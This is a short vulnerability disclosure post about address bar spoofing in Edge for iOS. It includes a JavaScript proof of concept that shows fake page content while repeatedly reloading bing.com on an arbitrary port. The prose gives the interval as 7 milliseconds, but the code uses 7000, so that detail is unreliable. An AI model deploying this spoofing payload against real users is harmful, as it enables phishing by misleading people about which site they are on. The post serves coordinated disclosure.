Microsoft Edge Browser For IOS - Address Bar Spoofing Vulnerability

 

During one of my previous posts "Multiple Address Bar Spoofing Vulnerabilities In Mobile Browsers", I discussed about several address bar spoofing vulnerabilities in major browsers uncovered during my research. However, there were several other vulnerabilities reported to other browsers for which the disclosure timeline of 60 days was not elapsed. Microsoft edge browser was one of them. 

The following is a proof of concept (POC) demonstrating a browser based spoofing vulnerability in Edge Browser for iOS.  The vulnerability is similar to address bar spoofing in Safari browser with slight modification to setInterval function. The vulnerability occurs due to Edge browser preserving address bar of the URL when requested over an arbitrary port, the set interval function reloads bing.com:8080 every 7 milliseconds and hence user is unable to recognize the redirection from the original URL to spoofed URL. The version affects  

Address Bar Spoofing in Edge Browser 45.9.5 

Proof of Concept

<script>

    document.write("<h1>This is not Bing</h1>");

    location.href = "https://bing.com:8081";

    setInterval(function(){location.href="https://bing.com:8080"},7000);

</script>

Note: The value of setInterval function maybe adjusted according to the browser in order to achieve an effective URL spoof.

As always, I am highly indebted to Tod Beardsley from Rapid7 team for his assistance in handling and coordinating the disclosure.